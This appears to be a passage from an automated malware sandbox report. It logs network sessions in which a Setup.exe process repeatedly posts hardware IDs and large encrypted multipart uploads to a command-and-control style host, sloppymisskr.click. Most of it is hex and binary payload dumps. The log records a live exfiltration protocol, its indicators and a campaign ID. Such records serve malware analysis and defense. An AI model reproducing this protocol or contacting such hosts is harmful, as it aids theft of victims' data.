                                                                                                                                                    2025-01-05 16:54:16 UTC1369INData Raw: 33 32 62 63 0d 0a 56 6b 35 47 4c 57 71 6d 75 76 4e 67 57 4c 32 47 46 6f 70 2b 6f 38 72 66 42 61 34 65 47 4b 78 67 31 66 42 66 63 67 47 30 4b 76 78 57 57 45 5a 73 4b 65 7a 34 75 79 4e 4b 72 34 46 77 35 41 4c 2f 6d 59 6c 56 37 67 34 70 36 57 32 53 70 6c 46 71 58 4c 6f 79 31 31 5a 49 52 68 52 6b 76 76 4c 39 65 42 79 5a 78 55 44 55 4b 2b 36 4f 77 58 7a 35 53 67 4c 6c 61 64 66 49 46 44 35 55 75 69 53 75 45 45 42 65 65 32 53 2b 37 71 78 67 42 50 79 55 46 59 39 2f 72 38 2f 65 54 62 42 56 52 2f 51 35 7a 62 52 52 61 6b 47 36 4d 71 35 52 41 78 51 35 4c 50 33 38 76 6d 64 69 6b 73 56 59 31 79 50 7a 6e 72 4a 73 30 45 45 47 34 58 66 58 31 77 6b 6e 51 2f 6c 76 36 53 67 2b 43 43 77 2b 2b 65 53 37 49 42 7a 69 68 6b 47 61 64 4d 48 66 78 42 4c 42 41 6b 66 36 4f 63 32 6d 4b
                                                                                                                                                    Data Ascii: 32bcVk5GLWqmuvNgWL2GFop+o8rfBa4eGKxg1fBfcgG0KvxWWEZsKez4uyNKr4Fw5AL/mYlV7g4p6W2SplFqXLoy11ZIRhRkvvL9eByZxUDUK+6OwXz5SgLladfIFD5UuiSuEEBee2S+7qxgBPyUFY9/r8/eTbBVR/Q5zbRRakG6Mq5RAxQ5LP38vmdiksVY1yPznrJs0EEG4XfX1wknQ/lv6Sg+CCw++eS7IBzihkGadMHfxBLBAkf6Oc2mK
                                                                                                                                                    2025-01-05 16:54:16 UTC1369INData Raw: 31 6f 41 39 41 45 47 74 79 72 4b 54 39 4d 68 7a 30 68 67 6e 5a 50 75 71 5a 6a 30 54 39 43 7a 6e 63 58 70 76 68 48 6a 78 44 39 32 62 50 46 52 45 4d 46 52 54 72 36 62 4d 75 57 37 72 58 44 70 52 73 39 39 2f 55 61 37 34 45 52 39 30 33 31 66 35 66 63 68 50 50 61 65 41 59 42 78 41 36 5a 39 6e 6b 75 69 46 4b 76 4d 74 43 2b 79 2f 70 6c 63 77 63 76 6b 70 48 75 69 76 62 70 68 73 37 45 36 49 36 76 45 31 56 56 58 78 36 72 50 58 7a 4f 52 79 36 68 68 61 49 59 72 69 4e 7a 41 71 2b 43 77 54 77 61 35 50 6c 43 53 6b 55 78 46 54 4c 41 51 4d 57 4c 53 6e 41 31 4a 59 73 57 71 76 63 53 64 77 4b 32 4e 2f 43 45 76 45 4d 58 39 73 35 33 61 59 67 5a 42 50 69 4b 72 5a 57 4e 51 55 6c 4a 50 6e 38 72 47 31 35 75 38 56 65 33 43 2b 34 30 63 78 55 76 68 52 58 72 44 6d 52 39 31 39 79 41 36
                                                                                                                                                    Data Ascii: 1oA9AEGtyrKT9Mhz0hgnZPuqZj0T9CzncXpvhHjxD92bPFREMFRTr6bMuW7rXDpRs99/Ua74ER9031f5fchPPaeAYBxA6Z9nkuiFKvMtC+y/plcwcvkpHuivbphs7E6I6vE1VVXx6rPXzORy6hhaIYriNzAq+CwTwa5PlCSkUxFTLAQMWLSnA1JYsWqvcSdwK2N/CEvEMX9s53aYgZBPiKrZWNQUlJPn8rG15u8Ve3C+40cxUvhRXrDmR919yA6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49750 | 104.21.90.109 | 443 | 6860 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 16:54:18 UTC | 275 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=LZCUHPS6R
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18108
    Host: sloppymisskr.click
2025-01-05 16:54:18 UTC | 15331 | OUT | Data Ascii: --LZCUHPS6RContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--LZCUHPS6RContent-Disposition: form-data; name="pid"2--LZCUHPS6RContent-Disposition: form-data; name="lid"hRjzG3--TRON--LZCUHPS6RContent-Dispo
2025-01-05 16:54:18 UTC | 1128 | IN | HTTP/1.1 200 OK
    Date: Sun, 05 Jan 2025 16:54:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=qeer97dh8mqf26v3ie0s71og90; expires=Thu, 01 May 2025 10:40:57 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdOX69eaq4WA0vovQqz6Jq1oACdlb%2Bi02XG57bhGwt6ROnEC49vLoZ9ieGlKjZDUB3kdrEP1lLiMToWU3VdnbYf6frjgGPuH1QZJKVp%2FMLB9Y0A5XMbfc00GlC3zH8brjmXRx2A%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd4fd4bff861921-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1478&rtt_var=739&sent=12&recv=23&lost=0&retrans=1&sent_bytes=4232&recv_bytes=19063&delivery_rate=362507&cwnd=139&unsent_bytes=0&cid=2dd9f521e7515f13&ts=712&x=0"
2025-01-05 16:54:18 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-05 16:54:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49752 | 104.21.90.109 | 443 | 6860 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 16:54:19 UTC | 279 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=YDRKR53H0UXY5E
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8759
    Host: sloppymisskr.click
2025-01-05 16:54:19 UTC | 8759 | OUT | Data Ascii: --YDRKR53H0UXY5EContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--YDRKR53H0UXY5EContent-Disposition: form-data; name="pid"2--YDRKR53H0UXY5EContent-Disposition: form-data; name="lid"hRjzG3--TRON--YDRKR53H0
2025-01-05 16:54:20 UTC | 1130 | IN | HTTP/1.1 200 OK
    Date: Sun, 05 Jan 2025 16:54:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=vq90ps582s8fp5ff0sq57d0r5t; expires=Thu, 01 May 2025 10:40:58 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zi7OnGYiJDa98pNwRRMPOwJFxIRQajhIWYKdy51KfeOyFZzUCKozdEqjPCP7LHiWqw2qQgUkowlc%2BIz%2FmMq5zANFpOQNEbfttRk86qrXpZiOXM8ppXCpybwq%2BPnCRaDNFzG5v48%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd4fd54fc484408-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2533&min_rtt=2494&rtt_var=1014&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9696&delivery_rate=1039145&cwnd=206&unsent_bytes=0&cid=3b3a13e79ddcec20&ts=573&x=0"
2025-01-05 16:54:20 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-05 16:54:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49753 | 104.21.90.109 | 443 | 6860 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 16:54:21 UTC | 278 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=UMY21CEW4IOI
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20400
    Host: sloppymisskr.click
2025-01-05 16:54:21 UTC | 15331 | OUT | Data Ascii: --UMY21CEW4IOIContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--UMY21CEW4IOIContent-Disposition: form-data; name="pid"3--UMY21CEW4IOIContent-Disposition: form-data; name="lid"hRjzG3--TRON--UMY21CEW4IOIC
2025-01-05 16:54:21 UTC | 1139 | IN | HTTP/1.1 200 OK
    Date: Sun, 05 Jan 2025 16:54:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=0jtrttkl2nf5ie1m84u59ma1ln; expires=Thu, 01 May 2025 10:41:00 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qmQk%2FpmrtdxujWFNP2qIdGKhA%2Bcc1HPgsrJBjLfxMUT2xqe0SJDE2iEA5tGklBIMoC1c3y8uDyAlQSPDpOnUfRbNOARMm9q%2FOfFM8%2FDtW62BttYVlUmwOhrvIF%2Fk%2BDM%2BCQodmtA%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd4fd5f2f4741d8-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1591&rtt_var=823&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21358&delivery_rate=1168467&cwnd=222&unsent_bytes=0&cid=7892f3f6ed0ce62c&ts=636&x=0"
2025-01-05 16:54:21 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-05 16:54:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49754 | 104.21.90.109 | 443 | 6860 | C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
2025-01-05 16:54:24 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=LI1MZWAEHW
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 7081
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:24 UTC7081OUTData Raw: 2d 2d 4c 49 31 4d 5a 57 41 45 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 31 35 42 38 42 38 43 45 46 37 44 36 35 45 33 41 39 45 45 32 44 31 36 30 32 30 36 31 36 30 0d 0a 2d 2d 4c 49 31 4d 5a 57 41 45 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 49 31 4d 5a 57 41 45 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 4c 49 31 4d 5a 57 41 45 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                    Data Ascii: --LI1MZWAEHWContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--LI1MZWAEHWContent-Disposition: form-data; name="pid"1--LI1MZWAEHWContent-Disposition: form-data; name="lid"hRjzG3--TRON--LI1MZWAEHWContent-D
2025-01-05 16:54:24 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:24 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=joe85umtiqqsmr7ejmehu1fnac; expires=Thu, 01 May 2025 10:41:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rfm1X3nClOmRMIV34EeJo0oiC5wFdT9KXnugoQ4y1sA1y%2B0FezyW9gxaUkpCKyI%2BwiBk0XgDv12iX0FnMLjw%2B5qrZGr74%2F1hwkg2xbc%2BerLEVHGCM0BB07OpNnohWgfH8zoRV6I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd718ab20c9c-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1601&rtt_var=613&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=7992&delivery_rate=1768625&cwnd=241&unsent_bytes=0&cid=e018a803dc73d28a&ts=462&x=0"
2025-01-05 16:54:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                    Data Ascii: fok 8.46.123.189
2025-01-05 16:54:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.4 | 49755       | 104.21.90.109  | 443              | 6860 | C:\Users\user\Desktop\Setup.exe
Timestamp               | Bytes transferred | Direction | Data
2025-01-05 16:54:25 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=7NCL0BD3V0SN8T
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 942
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:25 UTC942OUTData Raw: 2d 2d 37 4e 43 4c 30 42 44 33 56 30 53 4e 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 31 35 42 38 42 38 43 45 46 37 44 36 35 45 33 41 39 45 45 32 44 31 36 30 32 30 36 31 36 30 0d 0a 2d 2d 37 4e 43 4c 30 42 44 33 56 30 53 4e 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 4e 43 4c 30 42 44 33 56 30 53 4e 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 37 4e 43 4c 30 42 44 33 56
                                                                                                                                                    Data Ascii: --7NCL0BD3V0SN8TContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--7NCL0BD3V0SN8TContent-Disposition: form-data; name="pid"1--7NCL0BD3V0SN8TContent-Disposition: form-data; name="lid"hRjzG3--TRON--7NCL0BD3V
2025-01-05 16:54:25 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:25 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=ct1apfs20holgq17jatsvfnlaj; expires=Thu, 01 May 2025 10:41:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VrCqlzBNTdOGVmcPbWZcnDVdjVJEFTGepA3Ju7Nnp4jSO2i2jvfBYSc8f33aULSny9dzwKD4okUNAyw4YGD%2BkYjIqsLdFfQLrMVRsg6%2F1D9R6E4TVtSX1PWXJbJY4Z0QLGVye7U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd77fe8d0cc2-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1629&rtt_var=616&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1856&delivery_rate=1770770&cwnd=176&unsent_bytes=0&cid=f7df53ee7a350df5&ts=506&x=0"
2025-01-05 16:54:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                    Data Ascii: fok 8.46.123.189
2025-01-05 16:54:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.4 | 49756       | 104.21.90.109  | 443              | 6860 | C:\Users\user\Desktop\Setup.exe
Timestamp               | Bytes transferred | Direction | Data
2025-01-05 16:54:27 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=1T1XCH02CDNFYJ80Y
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 586961
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 2d 2d 31 54 31 58 43 48 30 32 43 44 4e 46 59 4a 38 30 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 31 35 42 38 42 38 43 45 46 37 44 36 35 45 33 41 39 45 45 32 44 31 36 30 32 30 36 31 36 30 0d 0a 2d 2d 31 54 31 58 43 48 30 32 43 44 4e 46 59 4a 38 30 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 54 31 58 43 48 30 32 43 44 4e 46 59 4a 38 30 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d
                                                                                                                                                    Data Ascii: --1T1XCH02CDNFYJ80YContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--1T1XCH02CDNFYJ80YContent-Disposition: form-data; name="pid"1--1T1XCH02CDNFYJ80YContent-Disposition: form-data; name="lid"hRjzG3--TRON--
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 2d 1b fb 9e 35 2c 16 1e 0b 8c 50 e1 43 dc 24 0a 4f 82 66 0b 65 a9 d1 e7 14 29 e7 cb d8 3f 31 76 28 bf f9 1f 5f b5 28 c6 85 0d e9 17 93 8e 5f 5b 35 eb dd d5 39 6c 8b 8c 8a aa e4 6d 93 59 6e 4e 13 dd 7a 45 4d 2a 71 d0 de 27 74 31 4b 15 1b 51 11 7f 9c 09 bc 0f 42 65 97 6a 66 4a af f1 e3 06 06 b7 f2 0a 89 8f 61 2f 75 c2 40 89 52 25 82 fe 3c bd d1 50 1b 33 74 e4 ec a4 76 f8 5f 1f f7 89 da 60 6e b7 f4 13 9c f9 9f 17 1e 9c 5a 33 9f 91 e9 aa 7a 90 ad 8e 66 4f ab 9b b2 df bf 4f 85 e8 3b 4c 85 6c e8 ab e6 1d 6c aa 9e a8 06 25 49 7b 42 0a ef ce b4 74 71 9e c9 af c0 0d f2 f7 40 5b 50 75 74 6f c2 69 ce 8e d9 42 93 30 f7 43 29 7b 71 d3 8c 21 17 37 1f e5 ae 55 de 10 de 86 f3 f9 eb eb 35 07 a9 e7 d9 e9 f3 3e 31 c2 00 e8 45 50 ad 51 29 34 cb 22 31 fa 4f f1 ee d5 93 7e cb
                                                                                                                                                    Data Ascii: -5,PC$Ofe)?1v(_(_[59lmYnNzEM*q't1KQBejfJa/u@R%<P3tv_`nZ3zfOO;Lll%I{Btq@[PutoiB0C){q!7U5>1EPQ)4"1O~
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 6a c5 c6 19 b1 ac ef 21 ae 49 80 6f 63 f9 8a 27 44 e6 00 85 49 80 dc 4c 60 0f 94 e7 ec f0 93 07 aa 98 c6 ad 58 22 61 23 15 84 db 40 fe ff f6 1e 92 f0 63 18 bb a0 5e d3 92 dc 1b af 28 36 0a ec 49 4d 2f 1b a1 e0 f9 d1 38 0e 50 fc 54 0c f6 e7 cd 94 76 df 78 72 98 a0 12 90 de c5 94 9b cd d6 b1 74 ae b3 36 42 89 7a 59 3c 8f e6 60 10 ec a6 ac 0d e5 bd 50 88 a6 0f 6d 81 45 8f 43 66 17 1b 24 05 75 dd ce bf 57 ba e0 b7 2f 52 48 ed 75 2a 8d f0 9d 96 99 01 27 f0 f9 42 d0 c9 8b aa bf ef b0 95 04 91 4c c2 20 ba c9 ee 72 1e e7 8a 18 36 b3 15 e6 17 7b bd 9e 04 f0 4d 5a df d9 ec fe 2a a0 5c 53 89 d5 5c f3 ea 7a 1a 6a e7 b2 31 f0 18 56 e6 74 9b 41 b7 4e 23 e6 f7 f2 38 8d b6 42 d4 7d 98 93 92 e7 49 1d 8c 48 2f de 18 c2 f3 88 6f 3c a2 ae 10 ef 43 87 4a 71 f6 79 06 70 fc de
                                                                                                                                                    Data Ascii: j!Ioc'DIL`X"a#@c^(6IM/8PTvxrt6BzY<`PmECf$uW/RHu*'BL r6{MZ*\S\zj1VtAN#8B}IH/o<CJqyp
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 49 36 4c e1 f9 1e 18 20 48 a9 50 13 28 16 6a 16 8d 6d a8 bb 82 32 50 45 2e af 0f e9 43 86 af bb 4b 27 0e 18 46 85 ef 05 c7 0d 10 67 8c 8b f8 a2 83 ee 61 18 ab 23 cd f7 37 4c 12 8d c1 4a ca 45 d6 1f 3d 83 fe 63 a9 43 33 cf c3 57 a0 1c 64 f0 45 07 62 57 e2 76 f5 91 bb af 9a 6f 59 1b 3f 62 d8 74 04 79 00 41 c8 b9 e7 9c 5d 81 e2 ef ce aa a5 c1 5a 95 02 ce e9 01 21 b2 2f e7 28 7b 0c 05 c2 b3 5b 6a 25 32 2e ff 17 bf 3f ee dc f0 91 be f0 e5 93 f7 05 8b ce 81 2d 36 f3 82 e7 6b ee 0e 04 50 02 bc b6 2a f7 60 ab bb 2f d8 9f 8f aa 16 d5 2e 15 00 87 12 88 6c c8 75 5e da c4 6d a1 54 7e 9b 48 a9 2c c8 63 11 fd ea ee 44 c5 0b a7 54 f8 de de 04 9e f3 65 26 44 53 40 da 32 8c ec e7 86 37 53 e8 1b 91 77 38 27 21 de 04 78 e4 52 06 40 7e 27 88 df cd 7c b9 3c 7a 9e 20 fa 9c 61
                                                                                                                                                    Data Ascii: I6L HP(jm2PE.CK'Fga#7LJE=cC3WdEbWvoY?btyA]Z!/({[j%2.?-6kP*`/.lu^mT~H,cDTe&DS@27Sw8'!xR@~'|<z a
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 58 0c 94 d4 78 08 72 0e e4 0a d7 eb 00 2f b5 fa 59 ce 85 ad 94 83 08 1d aa 4d bd 0a 18 fd ad 1e 4c 2f 90 5a 5f 71 e5 49 7b 6b 5d 87 f9 09 a7 ae fa c3 68 28 ce 49 e4 b5 37 4f 28 bc d6 b4 c6 a3 d4 94 a2 22 d9 03 c2 f5 7c b9 22 38 45 3f a5 83 dc dc e8 10 47 e8 95 ec 3a 69 e5 f3 d2 1a 0d 2b 96 d4 9c 6b 2a f2 db 4d 62 0c 1a ea aa ba 95 50 df 19 79 4f cc 62 af 88 cb 04 1f aa b5 92 04 27 6e 34 5e da f1 16 98 73 dc 1b cd 76 84 be f6 c3 e7 fb eb 67 36 47 7e f4 e9 49 b1 e5 35 1a 69 33 2d fb b5 47 23 62 63 d2 18 3c a1 50 bc bc eb 97 fb 95 ab 65 2a 80 e6 aa 32 38 bd 04 99 55 87 db e5 a8 a8 e2 e7 43 db 57 d6 fc 46 db 36 2c 2b 5a d6 5e 6f ba c5 45 d6 ad ab 1d e4 49 54 51 19 68 dc 88 f7 38 24 92 66 c8 45 6d 03 f6 a6 79 9a a1 3f 47 47 b9 6d 40 0b 82 ff be a7 e2 30 c9 b4
                                                                                                                                                    Data Ascii: Xxr/YML/Z_qI{k]h(I7O("|"8E?G:i+k*MbPyOb'n4^svg6G~I5i3-G#bc<Pe*28UCWF6,+Z^oEITQh8$fEmy?GGm@0
